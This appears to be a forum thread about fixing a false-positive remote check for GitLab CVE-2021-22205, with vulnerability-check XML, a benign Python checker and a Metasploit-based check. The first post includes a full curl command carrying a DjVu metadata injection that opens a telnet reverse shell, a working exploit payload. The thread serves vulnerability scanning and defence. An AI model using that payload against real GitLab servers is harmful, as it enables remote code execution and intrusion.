GitLab CVE-2021-22205 remote check

I’m ecstatic that a cookie fingerprint and remote check were made available for GitLab CVE-2021-22205. We run a lot of GitLab instances, and the check is so close, but it looks like the implementation is off by just a little bit.

R7 has a great analysis of the vulnerability that absolutely helps in narrowing down the false positives! CVE-2021-22205 | AttackerKB

Getting right down to it: the check sends a POST to /rapid7/cve-2021-22205.jpg, which does trigger a 422 response, but it triggers it on patched systems too. It looks like the logic issue is that no image data is actually being posted, and the GitLab router still responds with a 422 on a patched system.

<?xml version="1.0" encoding="UTF-8"?>
<!--
   Checks if the instance is running GitLab
       if successful it will send a bogus image to the URI
           check the response
               if we get a 422
                   vulnerable
-->
<VulnerabilityCheck id="gitlab-cve-2021-22205" scope="endpoint">
   <NetworkService type="HTTP|HTTPS">
      <Product vendor="GitLab" name="GitLab"/>
   </NetworkService>
   <HTTPCheck>
      <HTTPRequest method="POST">
         <URI>/rapid7/cve-2021-22205.jpg</URI>
         <HTTPResponse code="422"/>
      </HTTPRequest>
   </HTTPCheck>
</VulnerabilityCheck>

However, if you POST image data to the GitLab service, it will return the expected 404 if it has been patched. So something like the following gets the appropriate response.

curl -i -s -k -X $'POST' \
    -H $'Host: 127.0.0.1' -H $'Content-Type: multipart/form-data; boundary=------------------------3749bbf4d5269117' -H $'Connection: close' \
    --data-binary $'--------------------------3749bbf4d5269117\x0d\x0aContent-Disposition: form-data; name=\"file\"; filename=\"cve-2021-22205.jpg\"\x0d\x0aContent-Type: image/jpeg\x0d\x0a\x0d\x0aAT&TFORM\x00\x00\x03\xafDJVMDIRM\x00\x00\x00.\x81\x00\x02\x00\x00\x00F\x00\x00\x00\xac\xff\xff\xde\xbf\x99 !\xc8\x91N\xeb\x0c\x07\x1f\xd2\xda\x88\xe8k\xe6D\x0f,q\x02\xeeI\xd3n\x95\xbd\xa2\xc3\"?FORM\x00\x00\x00^DJVUINFO\x00\x00\x00\x0a\x00\x08\x00\x08\x18\x00d\x00\x16\x00INCL\x00\x00\x00\x0fshared_anno.iff\x00BG44\x00\x00\x00\x11\x00J\x01\x02\x00\x08\x00\x08\x8a\xe6\xe1\xb17\xd9\x7f*\x89\x00BG44\x00\x00\x00\x04\x01\x0f\xf9\x9fBG44\x00\x00\x00\x02\x02\x0aFORM\x00\x00\x03\x07DJVIANTa\x00\x00\x01P(metadata\x0a\x09(Copyright \"\\\x0a\" . qx{TF=$(mktemp -u);mkfifo $TF && telnet 127.0.0.1 5555 0<$TF | sh 1>$TF} . \\\x0a\" b \") )                                                                                                                                                                                                                                                                                                                                                                                                                                     \x0a\x0d\x0a--------------------------3749bbf4d5269117--\x0d\x0a' \
    $'http://127.0.0.1/de0cf91a2f2aafef'

I’m trying to determine whether there is a best practice for setting a benign image payload in the check, so that an updated check actually posts image data. Something like, but not exactly:

<VulnerabilityCheck id="gitlab-cve-2021-22205" scope="endpoint">
   <NetworkService type="HTTP|HTTPS">
      <Product vendor="GitLab" name="GitLab"/>
   </NetworkService>
   <HTTPCheck>
      <HTTPRequest method="POST">
         <URI>/rapid7_cve-2021-22205</URI>
            <mimeContent type="multipart/form-data">
              <value format="hex">{insert payload hex here}</value>
            </mimeContent>
         <HTTPResponse code="422"/>
      </HTTPRequest>
   </HTTPCheck>
</VulnerabilityCheck>
2 Likes
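The distinction the post above draws (a multipart upload with image bytes and a .jpg filename gets a 422 on a vulnerable instance and a 404 on a patched one, while an empty POST gets 422 on both) can be turned into a standalone remote check. The script below is an added example and is not Rapid7's check, the Metasploit module, or GitLab code. It builds the multipart body itself, uses a benign DjVu form header (constructed here; it carries the same "AT&TFORM" magic as the thread's payload but no metadata chunk, so there is nothing for ExifTool to evaluate), posts it to a random path the way the curl command does, and maps the status code to a verdict exactly as the thread describes. The random path prefix, the boundary, the filename and the "unknown" bucket for any other status are assumptions of this example, not from the page.

```python
"""Remote check for GitLab CVE-2021-22205 that posts real image data.

Added example, not Rapid7's or GitLab's code. Assumed (not from the thread):
the random upload path, the boundary string, the filename "check.jpg", and
that any status other than 422/404 is reported as "unknown".
"""
import secrets
import ssl
import urllib.error
import urllib.request
from typing import Tuple

# Constructed benign DjVu: IFF-style "AT&TFORM" magic, a big-endian form length
# covering only the "DJVU" form id, and no ANTa/metadata chunk. It is enough to
# be routed like the thread's payload without carrying anything executable.
BENIGN_DJVU = b"AT&TFORM" + (4).to_bytes(4, "big") + b"DJVU"


def build_multipart(boundary: str, filename: str, content: bytes,
                    field: str = "file",
                    content_type: str = "image/jpeg") -> bytes:
    """Frame one file as a multipart/form-data body (CRLF line endings)."""
    crlf = b"\r\n"
    b = boundary.encode()
    return b"".join([
        b"--" + b + crlf,
        f'Content-Disposition: form-data; name="{field}"; '
        f'filename="{filename}"'.encode() + crlf,
        f"Content-Type: {content_type}".encode() + crlf,
        crlf,
        content + crlf,
        b"--" + b + b"--" + crlf,
    ])


def classify(status: int) -> str:
    """Map the upload's HTTP status to a verdict, as the thread describes:
    422 means the image went through the vulnerable ExifTool path, 404 means
    a patched instance fell through to the router for an unknown path."""
    if status == 422:
        return "vulnerable"
    if status == 404:
        return "patched"
    return "unknown"  # assumption: anything else needs a manual look


def check(base_url: str, timeout: float = 10.0,
          insecure: bool = False) -> Tuple[int, str]:
    """POST the benign image to a random path and return (status, verdict)."""
    boundary = "----cve202122205" + secrets.token_hex(8)   # assumed boundary
    path = "/" + secrets.token_hex(8)                     # random path, like the curl example
    body = build_multipart(boundary, "check.jpg", BENIGN_DJVU)  # .jpg name as in the thread
    req = urllib.request.Request(
        base_url.rstrip("/") + path, data=body, method="POST",
        headers={"Content-Type": f"multipart/form-data; boundary={boundary}",
                 "Connection": "close"})
    ctx = None
    if insecure:  # equivalent of curl -k for self-signed lab instances
        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    try:
        with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
            status = resp.status
    except urllib.error.HTTPError as e:   # 4xx/5xx are the interesting cases
        status = e.code
    return status, classify(status)


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1"
    code, verdict = check(target, insecure=True)
    print(f"{target}: HTTP {code} -> {verdict}")
```

Run it as `python3 check.py https://gitlab.example` against an instance you are authorised to test. Because the body is a real multipart upload with image bytes, an empty-body 422 no longer counts as a hit, which is the false-positive the thread is about.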

Got a false-positive report on our GitLab version 14.4.2 and was pulling my hair out trying to figure out what the difference was between the IVM check and the Metasploit module, then found your excellent writeup!

1 Like

I see that the check was converted to use msf instead. ./MetasploitRemoteScanner/1/checks.jar

<?xml version="1.0" encoding="UTF-8"?>
<VulnerabilityCheck id="gitlab-cve-2021-22205" scope="endpoint">
   <NetworkService type="HTTP|HTTPS">
      <Product vendor="GitLab" name="GitLab"/>
   </NetworkService>
   <Metasploit module="exploit/multi/http/gitlab_exif_rce"></Metasploit>
</VulnerabilityCheck>

This does actually post content properly, SSO redirect edge cases aside. Thank you so much to the check dev team for getting this into place!

1 Like